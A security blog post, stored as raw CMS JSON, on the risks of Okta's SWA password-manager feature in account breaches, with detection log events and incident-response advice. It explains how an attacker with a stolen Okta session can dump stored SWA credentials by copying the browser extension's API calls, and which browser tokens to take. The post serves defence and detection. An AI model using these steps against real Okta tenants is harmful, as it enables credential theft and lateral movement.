,[],{"data":258141,"content":258142,"nodeType":254},{},[258143],{"data":258144,"content":258145,"nodeType":178},{},[258146],{"data":258147,"marks":258148,"value":228394,"nodeType":173},{},[],{"data":258150,"content":258151,"nodeType":178},{},[258152],{"data":258153,"marks":258154,"value":228401,"nodeType":173},{},[],{"data":258156,"content":258159,"nodeType":312},{"target":258157},{"sys":258158},{"id":228406,"type":317,"linkType":318},[],{"data":258161,"content":258162,"nodeType":178},{},[258163],{"data":258164,"marks":258165,"value":228414,"nodeType":173},{},[],{"data":258167,"content":258168,"nodeType":178},{},[258169,258172,258176],{"data":258170,"marks":258171,"value":228421,"nodeType":173},{},[],{"data":258173,"marks":258174,"value":67363,"nodeType":173},{},[258175],{"type":1646},{"data":258177,"marks":258178,"value":228429,"nodeType":173},{},[],{"data":258180,"content":258183,"nodeType":312},{"target":258181},{"sys":258182},{"id":209109,"type":317,"linkType":318},[],{"data":258185,"content":258186,"nodeType":169},{},[258187],{"data":258188,"marks":258189,"value":15539,"nodeType":173},{},[],{"data":258191,"content":258192,"nodeType":178},{},[258193],{"data":258194,"marks":258195,"value":228447,"nodeType":173},{},[],{"data":258197,"content":258198,"nodeType":250},{},[258199,258208,258217],{"data":258200,"content":258201,"nodeType":254},{},[258202],{"data":258203,"content":258204,"nodeType":178},{},[258205],{"data":258206,"marks":258207,"value":228460,"nodeType":173},{},[],{"data":258209,"content":258210,"nodeType":254},{},[258211],{"data":258212,"content":258213,"nodeType":178},{},[258214],{"data":258215,"marks":258216,"value":228470,"nodeType":173},{},[],{"data":258218,"content":258219,"nodeType":254},{},[258220],{"data":258221,"content":258222,"nodeType":178},{},[258223],{"data":258224,"marks":258225,"value":228480,"nodeType":173},{},[],{"data":258227,"content":258228,"nodeType":169},{},[258229],{"data":258230,"marks":258231,"value":40632,"nodeType":173},{},[],{"data":258233,"content":258234,"nodeType":178},{},[258235],{"data":258236,"marks":258237,"value":228493,"nodeType":173},{},[],{"data":258239,"content":258240,"nodeType":178},{},[258241],{"data":258242,"marks":258243,"value":228500,"nodeType":173},{},[],{"data":258245,"content":258246,"nodeType":178},{},[258247],{"data":258248,"marks":258249,"value":228507,"nodeType":173},{},[],{"items":258251},[258252,258254],{"sys":258253,"name":505},{"id":504},{"sys":258255,"name":26137},{"id":26136},{"items":258257},[258258],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":258259},{"url":8615},{"__typename":1528,"sys":258261,"content":258263,"title":259436,"synopsis":259437,"hashTags":118,"publishedDate":259438,"slug":259439,"tagsCollection":259440,"authorsCollection":259446},{"id":258262},"1te7lpcknxuN73jdCdkXjd",{"json":258264},{"data":258265,"content":258266,"nodeType":165},{},[258267,258274,258281,258288,258295,258302,258309,258315,258322,258329,258336,258425,258430,258437,258444,258451,258484,258491,258498,258505,258512,258518,258525,258532,258555,258562,258568,258574,258581,258588,258595,258602,258609,258616,258623,258629,258635,258643,258650,258657,258664,258671,258678,258685,258692,258699,258706,258713,258720,258727,258732,258739,258746,258753,258760,258766,258772,258779,258786,258793,258816,258823,258829,258835,258842,258848,258855,258862,258873,258880,258887,258894,258901,258908,258925,259023,259030,259037,259085,259091,259098,259105,259112,259119,259126,259133,259139,259146,259165,259172,259179,259186,259193,259200,259207,259250,259257,259312,259318,259325,259388,259394,259401,259408,259415,259422,259429],{"data":258268,"content":258269,"nodeType":178},{},[258270],{"data":258271,"marks":258272,"value":258273,"nodeType":173},{},[],"This blog post covers the implications of using SWA as an authentication method in Okta, with a particular focus on what security teams need to consider in an account breach and subsequent incident response scenario. ",{"data":258275,"content":258276,"nodeType":178},{},[258277],{"data":258278,"marks":258279,"value":258280,"nodeType":173},{},[],"Spoiler alert: we’ll make the case that the true value of an SSO solution like Okta is in the use of SAML and OIDC authentication methods, not convenience features like SWA.",{"data":258282,"content":258283,"nodeType":169},{},[258284],{"data":258285,"marks":258286,"value":258287,"nodeType":173},{},[],"Introduction",{"data":258289,"content":258290,"nodeType":178},{},[258291],{"data":258292,"marks":258293,"value":258294,"nodeType":173},{},[],"To facilitate SSO logins to web applications, Okta allows the industry standard SAML and OIDC protocols for federated logins to be used with applications that support it. These represent the most secure and recommended options. However, Okta also offers a proprietary system called SWA to support apps that don’t support these protocols, or where they are otherwise unavailable due to licensing restrictions.     ",{"data":258296,"content":258297,"nodeType":178},{},[258298],{"data":258299,"marks":258300,"value":258301,"nodeType":173},{},[],"While SWA is referred to as an SSO login mechanism, functionally it’s a password manager. SWA stores username and password combinations for individual applications on a per-user basis and makes use of a browser extension to automate the login process on behalf of the user. ",{"data":258303,"content":258304,"nodeType":178},{},[258305],{"data":258306,"marks":258307,"value":258308,"nodeType":173},{},[],"The screenshot below shows an example of an application being configured to use SWA as opposed to SAML, in this case Salesforce:",{"data":258310,"content":258314,"nodeType":312},{"target":258311},{"sys":258312},{"id":258313,"type":317,"linkType":318},"4wrRez2VpTG1vjsvNFlklK",[],{"data":258316,"content":258317,"nodeType":178},{},[258318],{"data":258319,"marks":258320,"value":258321,"nodeType":173},{},[],"From this configuration screen it’s not obvious that there is a fundamental difference between some login methods like SWA and true federated identity methods like SAML 2.0. To better understand the difference and the risks of SWA, let’s look at it from an attacker’s perspective.",{"data":258323,"content":258324,"nodeType":169},{},[258325],{"data":258326,"marks":258327,"value":258328,"nodeType":173},{},[],"How are Okta accounts compromised?",{"data":258330,"content":258331,"nodeType":178},{},[258332],{"data":258333,"marks":258334,"value":258335,"nodeType":173},{},[],"While it’s common for Okta accounts to be protected using MFA, and sometimes device trust, there are still viable attack vectors. The two most prevalent attacks would be: ",{"data":258337,"content":258338,"nodeType":250},{},[258339,258354],{"data":258340,"content":258341,"nodeType":254},{},[258342],{"data":258343,"content":258344,"nodeType":178},{},[258345,258350],{"data":258346,"marks":258347,"value":258349,"nodeType":173},{},[258348],{"type":370},"Endpoint compromise",{"data":258351,"marks":258352,"value":258353,"nodeType":173},{},[]," - In a traditional endpoint compromise scenario, an attacker will generally have full access to the user’s browser. This means they can hijack existing Okta sessions by stealing authentication tokens, which bypass all device trust and MFA protections. For persistent access, they can keylog credentials when the user next logs in and add MFA methods or enrol a new endpoint with device trust.",{"data":258355,"content":258356,"nodeType":254},{},[258357],{"data":258358,"content":258359,"nodeType":178},{},[258360,258365,258369,258377,258380,258389,258393,258397,258406,258410,258414,258422],{"data":258361,"marks":258362,"value":258364,"nodeType":173},{},[258363],{"type":370},"Phishing attacks/MFA proxying",{"data":258366,"marks":258367,"value":258368,"nodeType":173},{},[]," - Traditional phishing attacks can be launched against Okta users to obtain credentials and/or authenticated sessions. Attacker-in-the-middle (AITM) attacks can be used to bypass common MFA mechanisms, and attacks against Okta users are typically carried out using tools such as ",{"data":258370,"content":258371,"nodeType":186},{"uri":181618},[258372],{"data":258373,"marks":258374,"value":258376,"nodeType":173},{},[258375],{"type":194},"evilginx",{"data":258378,"marks":258379,"value":2936,"nodeType":173},{},[],{"data":258381,"content":258383,"nodeType":186},{"uri":258382},"https://mrd0x.com/bypass-2fa-using-novnc/",[258384],{"data":258385,"marks":258386,"value":258388,"nodeType":173},{},[258387],{"type":194},"noVNC",{"data":258390,"marks":258391,"value":3107,"nodeType":173},{},[258392],{"type":370},{"data":258394,"marks":258395,"value":258396,"nodeType":173},{},[],"or ",{"data":258398,"content":258400,"nodeType":186},{"uri":258399},"https://github.com/fkasler/cuddlephish",[258401],{"data":258402,"marks":258403,"value":258405,"nodeType":173},{},[258404],{"type":194},"cuddlephish",{"data":258407,"marks":258408,"value":1477,"nodeType":173},{},[258409],{"type":370},{"data":258411,"marks":258412,"value":258413,"nodeType":173},{},[]," We’ve even seen groups using tooling specifically crafted to target Okta such as the notorious ",{"data":258415,"content":258416,"nodeType":186},{"uri":181557},[258417],{"data":258418,"marks":258419,"value":258421,"nodeType":173},{},[258420],{"type":194},"0ktapus group/campaign.",{"data":258423,"marks":258424,"value":37,"nodeType":173},{},[],{"data":258426,"content":258429,"nodeType":312},{"target":258427},{"sys":258428},{"id":169040,"type":317,"linkType":318},[],{"data":258431,"content":258432,"nodeType":169},{},[258433],{"data":258434,"marks":258435,"value":258436,"nodeType":173},{},[],"What is Okta SWA?",{"data":258438,"content":258439,"nodeType":178},{},[258440],{"data":258441,"marks":258442,"value":258443,"nodeType":173},{},[],"Okta Secure Web Authentication (SWA) provides SSO-like functionality to web applications that don’t support federated protocols and is intended to be used only when SAML or OIDC federated logins cannot be used. ",{"data":258445,"content":258446,"nodeType":178},{},[258447],{"data":258448,"marks":258449,"value":258450,"nodeType":173},{},[],"It is SSO-like in the sense that:",{"data":258452,"content":258453,"nodeType":250},{},[258454,258464,258474],{"data":258455,"content":258456,"nodeType":254},{},[258457],{"data":258458,"content":258459,"nodeType":178},{},[258460],{"data":258461,"marks":258462,"value":258463,"nodeType":173},{},[],"A user enters their single Okta password to login to Okta, ",{"data":258465,"content":258466,"nodeType":254},{},[258467],{"data":258468,"content":258469,"nodeType":178},{},[258470],{"data":258471,"marks":258472,"value":258473,"nodeType":173},{},[],"SWA then stores username/password combinations ",{"data":258475,"content":258476,"nodeType":254},{},[258477],{"data":258478,"content":258479,"nodeType":178},{},[258480],{"data":258481,"marks":258482,"value":258483,"nodeType":173},{},[],"SWA then makes use of a browser extension to automatically login to applications using the credentials. ",{"data":258485,"content":258486,"nodeType":178},{},[258487],{"data":258488,"marks":258489,"value":258490,"nodeType":173},{},[],"In that sense, it’s essentially a password manager. Like any password manager, it can be a big security improvement over a user manually managing their accounts or reusing the same password everywhere.",{"data":258492,"content":258493,"nodeType":178},{},[258494],{"data":258495,"marks":258496,"value":258497,"nodeType":173},{},[],"There’s a good reason that true SSO is considered more secure than password managers, and this comes down to the identity. An SSO uses a single identity that is federated to other apps, where a password manager just better manages many discrete identities. So, when an employee leaves an organization and they’re using an SSO, a single identity needs to be disabled, but disabling access to a password manager does nothing to disable the identities inside it.",{"data":258499,"content":258500,"nodeType":178},{},[258501],{"data":258502,"marks":258503,"value":258504,"nodeType":173},{},[],"In the case of SWA, the use of a browser extension and a long list of supported applications with custom login scripts already written is a key value add. This means users don’t need to copy/paste credentials like they might with some password managers. ",{"data":258506,"content":258507,"nodeType":178},{},[258508],{"data":258509,"marks":258510,"value":258511,"nodeType":173},{},[],"However, unlike typical password managers, there isn’t just one type of SWA, administrators can actually pick between one of five configuration options. This is shown in the screenshot below:",{"data":258513,"content":258517,"nodeType":312},{"target":258514},{"sys":258515},{"id":258516,"type":317,"linkType":318},"42kt5hDFjjVYLf85HnjlU8",[],{"data":258519,"content":258520,"nodeType":178},{},[258521],{"data":258522,"marks":258523,"value":258524,"nodeType":173},{},[],"So, it’s possible to configure SWA like a traditional password manager scenario where the user sets their own username and password. However, as you can see above, you can set it up so that administrators can fully control the credentials, including the use of shared credentials used by multiple users.",{"data":258526,"content":258527,"nodeType":178},{},[258528],{"data":258529,"marks":258530,"value":258531,"nodeType":173},{},[],"SWA can also control the default configuration of the password reveal capability:",{"data":258533,"content":258534,"nodeType":250},{},[258535,258545],{"data":258536,"content":258537,"nodeType":254},{},[258538],{"data":258539,"content":258540,"nodeType":178},{},[258541],{"data":258542,"marks":258543,"value":258544,"nodeType":173},{},[],"When configured to allow users to set their own credentials, password reveal is enabled by default. ",{"data":258546,"content":258547,"nodeType":254},{},[258548],{"data":258549,"content":258550,"nodeType":178},{},[258551],{"data":258552,"marks":258553,"value":258554,"nodeType":173},{},[],"When administrators control the credentials, password reveal is disabled by default. ",{"data":258556,"content":258557,"nodeType":178},{},[258558],{"data":258559,"marks":258560,"value":258561,"nodeType":173},{},[],"Since Okta SWA performs logins automatically on behalf of the user, the user doesn’t technically need to be able to view or copy/paste the credentials. This makes it possible for Okta to support disabling password reveal. ",{"data":258563,"content":258567,"nodeType":312},{"target":258564},{"sys":258565},{"id":258566,"type":317,"linkType":318},"3IE8neYJbh0H8Vc7Hd9p5W",[],{"data":258569,"content":258573,"nodeType":312},{"target":258570},{"sys":258571},{"id":258572,"type":317,"linkType":318},"5C1lhoJtBEgdndiL9gSUbd",[],{"data":258575,"content":258576,"nodeType":169},{},[258577],{"data":258578,"marks":258579,"value":258580,"nodeType":173},{},[],"What are the security risks of using SWA?",{"data":258582,"content":258583,"nodeType":178},{},[258584],{"data":258585,"marks":258586,"value":258587,"nodeType":173},{},[],"While SWA may be a step up from users performing manual logins to a range of apps, it carries the same risk that any password manager solution has. If your account is compromised then all your usernames and passwords can be stolen in one go.",{"data":258589,"content":258590,"nodeType":178},{},[258591],{"data":258592,"marks":258593,"value":258594,"nodeType":173},{},[],"But how can that be if password reveal has been disabled",{"data":258596,"content":258597,"nodeType":235},{},[258598],{"data":258599,"marks":258600,"value":258601,"nodeType":173},{},[],"1. Bypassing password reveal restrictions",{"data":258603,"content":258604,"nodeType":178},{},[258605],{"data":258606,"marks":258607,"value":258608,"nodeType":173},{},[],"Even if users don’t directly interact with their passwords themselves (e.g. via copy/paste), their browser needs access otherwise it wouldn’t be possible to login to apps. ",{"data":258610,"content":258611,"nodeType":178},{},[258612],{"data":258613,"marks":258614,"value":258615,"nodeType":173},{},[],"The Okta browser extension uses the user’s active Okta login session to request credentials in the background, then automatically logs in to apps without the user ever directly seeing those credentials. So, while disabling password reveal may defeat a low-skill attacker or normal user scenarios, it’s essentially a client-side control, and isn’t going to stop a more determined attacker or technical user from getting at the credentials. This isn’t a bug, it’s a technical limitation of how a password manager works.",{"data":258617,"content":258618,"nodeType":178},{},[258619],{"data":258620,"marks":258621,"value":258622,"nodeType":173},{},[],"For example, let’s say a user has Salesforce configured as an app with SWA and clicks the app tile in the extension to login. The browser extension will use the active user session to make a request like the following (headers and irrelevant data removed for clarity):",{"data":258624,"content":258628,"nodeType":312},{"target":258625},{"sys":258626},{"id":258627,"type":317,"linkType":318},"2tiqg9EUoa9KxkTCduZoVe",[],{"data":258630,"content":258634,"nodeType":312},{"target":258631},{"sys":258632},{"id":258633,"type":317,"linkType":318},"4ApkgD7IwPRC3jC09Jf2SJ",[],{"data":258636,"content":258637,"nodeType":178},{},[258638],{"data":258639,"marks":258640,"value":258642,"nodeType":173},{},[258641],{"type":1646},"This response to the browser extension’s web request contains the username and password for Salesforce",{"data":258644,"content":258645,"nodeType":178},{},[258646],{"data":258647,"marks":258648,"value":258649,"nodeType":173},{},[],"This is the Salesforce-specific login script that allows the extension to automatically log the user in to Salesforce and includes their credentials. This request will include the credentials even if password reveal is disabled - the request above was captured using an intercepting proxy like Burp Suite.",{"data":258651,"content":258652,"nodeType":235},{},[258653],{"data":258654,"marks":258655,"value":258656,"nodeType":173},{},[],"2. Cross-account shared passwords",{"data":258658,"content":258659,"nodeType":178},{},[258660],{"data":258661,"marks":258662,"value":258663,"nodeType":173},{},[],"An additional risk with SWA is an operational one. Administrators can set passwords for users and also disable password reveal, which can encourage the use of shared passwords, since they don’t expect the users to see them. ",{"data":258665,"content":258666,"nodeType":178},{},[258667],{"data":258668,"marks":258669,"value":258670,"nodeType":173},{},[],"If administrators are auto-generating complex passwords for every single user account they create as a strong operational process, then there may be no issue. However, breach history would tell us that rarely do organizations have operational security practices as stringent as that.",{"data":258672,"content":258673,"nodeType":178},{},[258674],{"data":258675,"marks":258676,"value":258677,"nodeType":173},{},[],"An attacker compromising an Okta user account can not only extract valid credentials for all configured SWA apps for that user, but may uncover passwords that are valid for other user accounts configured by administrators, making this a likely vector for lateral movement.",{"data":258679,"content":258680,"nodeType":235},{},[258681],{"data":258682,"marks":258683,"value":258684,"nodeType":173},{},[],"3. Shared Okta passwords",{"data":258686,"content":258687,"nodeType":178},{},[258688],{"data":258689,"marks":258690,"value":258691,"nodeType":173},{},[],"One SWA option administrators can configure is to require the user to use their Okta password for the application (see earlier screenshot of configuration options). In this case, Okta lets the user set the password for the application, but it will confirm it matches the user’s Okta password and reject it otherwise.",{"data":258693,"content":258694,"nodeType":178},{},[258695],{"data":258696,"marks":258697,"value":258698,"nodeType":173},{},[],"This is a dangerous option, since it means the user’s Okta password is shared with other applications. So, if one of those applications is compromised, then their Okta password could be breached as well, which could allow both other applications and the user’s core Okta account to be compromised. It’s essentially enforcing password re-use, the exact opposite of what you want from an identity security perspective.",{"data":258700,"content":258701,"nodeType":235},{},[258702],{"data":258703,"marks":258704,"value":258705,"nodeType":173},{},[],"4. Persistent access to connected apps",{"data":258707,"content":258708,"nodeType":178},{},[258709],{"data":258710,"marks":258711,"value":258712,"nodeType":173},{},[],"Okta acts as an authentication gateway for access to other applications. Ideally, strong authentication policies will be in place such as strong password policies, MFA, account lockout and detection and response controls.",{"data":258714,"content":258715,"nodeType":178},{},[258716],{"data":258717,"marks":258718,"value":258719,"nodeType":173},{},[],"However, if even a temporary compromise of an Okta account is achieved (for example through an Okta session theft), an attacker extracting all credentials for SWA apps does not need to maintain access to Okta any further. Instead, they can maintain persistent access to all the downstream SWA apps by logging in manually, using the credentials they have extracted without using Okta. ",{"data":258721,"content":258722,"nodeType":178},{},[258723],{"data":258724,"marks":258725,"value":258726,"nodeType":173},{},[],"This greatly complicates incident response playbooks. Where an otherwise simple recovery action like disabling an Okta account, resetting the password and MFA methods, et cetera, would kick an attacker out of the Okta account - for a user using SWA the attacker will still have all the access to downstream SWA applications unless every single SWA app user account is recovered as well. This is where the value of a federated identity becomes clear.",{"data":258728,"content":258731,"nodeType":312},{"target":258729},{"sys":258730},{"id":209109,"type":317,"linkType":318},[],{"data":258733,"content":258734,"nodeType":169},{},[258735],{"data":258736,"marks":258737,"value":258738,"nodeType":173},{},[],"Dumping SWA credentials",{"data":258740,"content":258741,"nodeType":178},{},[258742],{"data":258743,"marks":258744,"value":258745,"nodeType":173},{},[],"Since Okta SWA functions as a password manager, and it’s also possible to bypass password reveal restrictions, an attacker who has gained temporary access to an Okta session can automate the extraction of all credentials stored via SWA for that account.",{"data":258747,"content":258748,"nodeType":235},{},[258749],{"data":258750,"marks":258751,"value":258752,"nodeType":173},{},[],"Using the password reveal API",{"data":258754,"content":258755,"nodeType":178},{},[258756],{"data":258757,"marks":258758,"value":258759,"nodeType":173},{},[],"One method would be to automate the password reveal API call in the dashboard for every app configured. This is the simplest, direct way to get credentials but has the disadvantage that it will not return credentials that have had password reveal disabled. The following screenshots show an example of the API call that is made:",{"data":258761,"content":258765,"nodeType":312},{"target":258762},{"sys":258763},{"id":258764,"type":317,"linkType":318},"27xCaphfwy6zSNU7QDQZ1g",[],{"data":258767,"content":258771,"nodeType":312},{"target":258768},{"sys":258769},{"id":258770,"type":317,"linkType":318},"begENC8Oxq4rwprZ0fGpG",[],{"data":258773,"content":258774,"nodeType":235},{},[258775],{"data":258776,"marks":258777,"value":258778,"nodeType":173},{},[],"Using the browser extension API",{"data":258780,"content":258781,"nodeType":178},{},[258782],{"data":258783,"marks":258784,"value":258785,"nodeType":173},{},[],"The more effective way for an attacker to dump credentials, and bypass password reveal restrictions, is to emulate the API calls made by the browser extension to retrieve the login scripts for each SWA application. ",{"data":258787,"content":258788,"nodeType":178},{},[258789],{"data":258790,"marks":258791,"value":258792,"nodeType":173},{},[],"For an attacker to make these calls, a valid Okta session is needed. Specifically, the tokens that need to be extracted from the browser for these calls are:",{"data":258794,"content":258795,"nodeType":250},{},[258796,258806],{"data":258797,"content":258798,"nodeType":254},{},[258799],{"data":258800,"content":258801,"nodeType":178},{},[258802],{"data":258803,"marks":258804,"value":258805,"nodeType":173},{},[],"The access token in “okta-token-storage” in browser local storage",{"data":258807,"content":258808,"nodeType":254},{},[258809],{"data":258810,"content":258811,"nodeType":178},{},[258812],{"data":258813,"marks":258814,"value":258815,"nodeType":173},{},[],"The “idx” token in cookies",{"data":258817,"content":258818,"nodeType":178},{},[258819],{"data":258820,"marks":258821,"value":258822,"nodeType":173},{},[],"These can be seen below:",{"data":258824,"content":258828,"nodeType":312},{"target":258825},{"sys":258826},{"id":258827,"type":317,"linkType":318},"4ooNI3TmnxqCAtw9MZuuVI",[],{"data":258830,"content":258834,"nodeType":312},{"target":258831},{"sys":258832},{"id":258833,"type":317,"linkType":318},"6rbgLXHewT34SPH3qA24Fu",[],{"data":258836,"content":258837,"nodeType":178},{},[258838],{"data":258839,"marks":258840,"value":258841,"nodeType":173},{},[],"The following screenshot shows the use of a simple internal PoC we created to investigate logging detection opportunities. It gives a sense of the type of information that can be retrieved for a test Okta user account: ",{"data":258843,"content":258847,"nodeType":312},{"target":258844},{"sys":258845},{"id":258846,"type":317,"linkType":318},"5lYhdtWKVqIch6CpksR7Dd",[],{"data":258849,"content":258850,"nodeType":169},{},[258851],{"data":258852,"marks":258853,"value":258854,"nodeType":173},{},[],"So if SWA can be risky, is SAML and OIDC safe?",{"data":258856,"content":258857,"nodeType":178},{},[258858],{"data":258859,"marks":258860,"value":258861,"nodeType":173},{},[],"In general, much more so, but as is unfortunately so often the case in security, the answer is “it depends.” The threat profile for federated SSO like SAML and OIDC is very different, and they don’t suffer from the risks highlighted with SWA use given above. ",{"data":258863,"content":258864,"nodeType":178},{},[258865,258870],{"data":258866,"marks":258867,"value":258869,"nodeType":173},{},[258868],{"type":370},"Any organization using Okta should strive to use SAML/OIDC for as many applications as possible - this is the true power of a federated identity solution",{"data":258871,"marks":258872,"value":1477,"nodeType":173},{},[],{"data":258874,"content":258875,"nodeType":178},{},[258876],{"data":258877,"marks":258878,"value":258879,"nodeType":173},{},[],"However, it’s important to remember that not even SAML/OIDC isn't a silver bullet.",{"data":258881,"content":258882,"nodeType":178},{},[258883],{"data":258884,"marks":258885,"value":258886,"nodeType":173},{},[],"For example, it’s still possible for an attacker achieving a temporary compromise of an Okta account to click every single SAML/OIDC application to establish authenticated sessions with all of them. While some sessions may be short-lived, depending on the application, these sessions may stay alive for longer periods such as 30 days or for some apps even indefinitely. ",{"data":258888,"content":258889,"nodeType":178},{},[258890],{"data":258891,"marks":258892,"value":258893,"nodeType":173},{},[],"While it may be simple for incident responders to disable an Okta account temporarily, it’s certainly much more difficult to disable all connected SaaS accounts and/or kill active sessions for all of them. ",{"data":258895,"content":258896,"nodeType":178},{},[258897],{"data":258898,"marks":258899,"value":258900,"nodeType":173},{},[],"Additionally, while active sessions won’t generally allow an attacker long-term access to an application like stolen SWA credentials often will, many different SaaS applications support methods that can be used to effectively backdoor access to them - though this is a risk to both SWA and federated identities.",{"data":258902,"content":258903,"nodeType":178},{},[258904],{"data":258905,"marks":258906,"value":258907,"nodeType":173},{},[],"This is another big challenge for incident responders to deal with, as it can allow attacks to maintain persistence without requiring valid credentials or active sessions. In other words, there are many ways to turn that short term access into persistent access outside Okta. ",{"data":258909,"content":258910,"nodeType":178},{},[258911,258914,258921],{"data":258912,"marks":258913,"value":230045,"nodeType":173},{},[],{"data":258915,"content":258916,"nodeType":186},{"uri":88239},[258917],{"data":258918,"marks":258919,"value":88245,"nodeType":173},{},[258920],{"type":194},{"data":258922,"marks":258923,"value":258924,"nodeType":173},{},[],". Some of the most common techniques that apply here are:",{"data":258926,"content":258927,"nodeType":250},{},[258928,258947,258966,258985,259004],{"data":258929,"content":258930,"nodeType":254},{},[258931],{"data":258932,"content":258933,"nodeType":178},{},[258934,258937,258944],{"data":258935,"marks":258936,"value":37,"nodeType":173},{},[],{"data":258938,"content":258939,"nodeType":186},{"uri":59347},[258940],{"data":258941,"marks":258942,"value":230075,"nodeType":173},{},[258943],{"type":194},{"data":258945,"marks":258946,"value":37,"nodeType":173},{},[],{"data":258948,"content":258949,"nodeType":254},{},[258950],{"data":258951,"content":258952,"nodeType":178},{},[258953,258956,258963],{"data":258954,"marks":258955,"value":37,"nodeType":173},{},[],{"data":258957,"content":258958,"nodeType":186},{"uri":230093},[258959],{"data":258960,"marks":258961,"value":230096,"nodeType":173},{},[258962],{"type":194},{"data":258964,"marks":258965,"value":37,"nodeType":173},{},[],{"data":258967,"content":258968,"nodeType":254},{},[258969],{"data":258970,"content":258971,"nodeType":178},{},[258972,258975,258982],{"data":258973,"marks":258974,"value":37,"nodeType":173},{},[],{"data":258976,"content":258977,"nodeType":186},{"uri":832},[258978],{"data":258979,"marks":258980,"value":230116,"nodeType":173},{},[258981],{"type":194},{"data":258983,"marks":258984,"value":37,"nodeType":173},{},[],{"data":258986,"content":258987,"nodeType":254},{},[258988],{"data":258989,"content":258990,"nodeType":178},{},[258991,258994,259001],{"data":258992,"marks":258993,"value":37,"nodeType":173},{},[],{"data":258995,"content":258996,"nodeType":186},{"uri":197688},[258997],{"data":258998,"marks":258999,"value":230136,"nodeType":173},{},[259000],{"type":194},{"data":259002,"marks":259003,"value":37,"nodeType":173},{},[],{"data":259005,"content":259006,"nodeType":254},{},[259007],{"data":259008,"content":259009,"nodeType":178},{},[259010,259013,259020],{"data":259011,"marks":259012,"value":37,"nodeType":173},{},[],{"data":259014,"content":259015,"nodeType":186},{"uri":144083},[259016],{"data":259017,"marks":259018,"value":230156,"nodeType":173},{},[259019],{"type":194},{"data":259021,"marks":259022,"value":37,"nodeType":173},{},[],{"data":259024,"content":259025,"nodeType":169},{},[259026],{"data":259027,"marks":259028,"value":259029,"nodeType":173},{},[],"Investigating and detecting an Okta account compromise",{"data":259031,"content":259032,"nodeType":178},{},[259033],{"data":259034,"marks":259035,"value":259036,"nodeType":173},{},[],"The good news is there are multiple Okta log events that can be used for either investigating a breach or providing some detection mechanisms via a SIEM. Three key log events are as follows:",{"data":259038,"content":259039,"nodeType":250},{},[259040,259055,259070],{"data":259041,"content":259042,"nodeType":254},{},[259043],{"data":259044,"content":259045,"nodeType":178},{},[259046,259051],{"data":259047,"marks":259048,"value":259050,"nodeType":173},{},[259049],{"type":370},"Show password event",{"data":259052,"marks":259053,"value":259054,"nodeType":173},{},[]," - indicates when a user has clicked the reveal password button",{"data":259056,"content":259057,"nodeType":254},{},[259058],{"data":259059,"content":259060,"nodeType":178},{},[259061,259066],{"data":259062,"marks":259063,"value":259065,"nodeType":173},{},[259064],{"type":370},"Evaluation of sign-on policy",{"data":259067,"marks":259068,"value":259069,"nodeType":173},{},[]," - occurs when the browser extension requests credentials",{"data":259071,"content":259072,"nodeType":254},{},[259073],{"data":259074,"content":259075,"nodeType":178},{},[259076,259081],{"data":259077,"marks":259078,"value":259080,"nodeType":173},{},[259079],{"type":370},"User single sign on to app",{"data":259082,"marks":259083,"value":259084,"nodeType":173},{},[]," - occurs when a full app login is performed",{"data":259086,"content":259090,"nodeType":312},{"target":259087},{"sys":259088},{"id":259089,"type":317,"linkType":318},"23G5QvwzgyTEJBJ33Ut7NJ",[],{"data":259092,"content":259093,"nodeType":178},{},[259094],{"data":259095,"marks":259096,"value":259097,"nodeType":173},{},[],"Using these events in a post-compromise situation could potentially significantly reduce the response actions required. If there is clear evidence that the attacker only accessed a limited number of applications, focus can be placed on disabling those accounts and removing potential backdoors, as opposed to having to perform containment procedures for every single application the user has access to.",{"data":259099,"content":259100,"nodeType":235},{},[259101],{"data":259102,"marks":259103,"value":259104,"nodeType":173},{},[],"Short time-window detection",{"data":259106,"content":259107,"nodeType":178},{},[259108],{"data":259109,"marks":259110,"value":259111,"nodeType":173},{},[],"While the events above are great for investigation, they are all expected events during normal use of Okta by a user. Perhaps the “show password” event may be rarer, but it would still not be completely unusual to see. ",{"data":259113,"content":259114,"nodeType":178},{},[259115],{"data":259116,"marks":259117,"value":259118,"nodeType":173},{},[],"This makes detection more difficult as defenders need to separate malicious logins from legitimate logins, a notoriously difficult task.",{"data":259120,"content":259121,"nodeType":178},{},[259122],{"data":259123,"marks":259124,"value":259125,"nodeType":173},{},[],"For proactive detection, one option would be to detect unusually large numbers of these events in a short time window for the same user account. This would be especially effective against automated tools. It would be much more unusual to see a legitimate user login to every app or reveal every password all in one go, or even all in one day. On the other hand, an attacker may seek to compromise all applications in a short time window.",{"data":259127,"content":259128,"nodeType":178},{},[259129],{"data":259130,"marks":259131,"value":259132,"nodeType":173},{},[],"Given below is an example of the flurry of logs generated by running our internal SWA password dumping tool shown earlier. You can see they are all generated in a very short time window:",{"data":259134,"content":259138,"nodeType":312},{"target":259135},{"sys":259136},{"id":259137,"type":317,"linkType":318},"2PaCRx02gpTyYOiuJ85x9Y",[],{"data":259140,"content":259141,"nodeType":178},{},[259142],{"data":259143,"marks":259144,"value":259145,"nodeType":173},{},[],"The only difficulty here is picking sensible numbers for the minimum number of apps and maximum time window required in order to generate a detection event. This would likely need customizing to individual environments based on what number of applications are typical for a user to have access to.",{"data":259147,"content":259148,"nodeType":178},{},[259149,259153,259162],{"data":259150,"marks":259151,"value":259152,"nodeType":173},{},[],"For more general Okta detection rule options, consider checking out the Okta rules contained in the open-source ",{"data":259154,"content":259156,"nodeType":186},{"uri":259155},"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta",[259157],{"data":259158,"marks":259159,"value":259161,"nodeType":173},{},[259160],{"type":194},"Sigma rule repository on GitHub",{"data":259163,"marks":259164,"value":1477,"nodeType":173},{},[],{"data":259166,"content":259167,"nodeType":169},{},[259168],{"data":259169,"marks":259170,"value":259171,"nodeType":173},{},[],"Guidance for incident response",{"data":259173,"content":259174,"nodeType":178},{},[259175],{"data":259176,"marks":259177,"value":259178,"nodeType":173},{},[],"If there is one key takeaway from this article, it’s that responding to an Okta account compromise isn’t as simple as disabling the user’s Okta account and/or resetting passwords and MFA factors.",{"data":259180,"content":259181,"nodeType":178},{},[259182],{"data":259183,"marks":259184,"value":259185,"nodeType":173},{},[],"Once an attacker has compromised an Okta account, it should be initially assumed that all connected application accounts are also compromised, whether they use SAML, OIDC or SWA. ",{"data":259187,"content":259188,"nodeType":178},{},[259189],{"data":259190,"marks":259191,"value":259192,"nodeType":173},{},[],"If SWA is used, incident responders should also explore whether those passwords are compromised and whether any other accounts that potentially share those passwords are compromised. 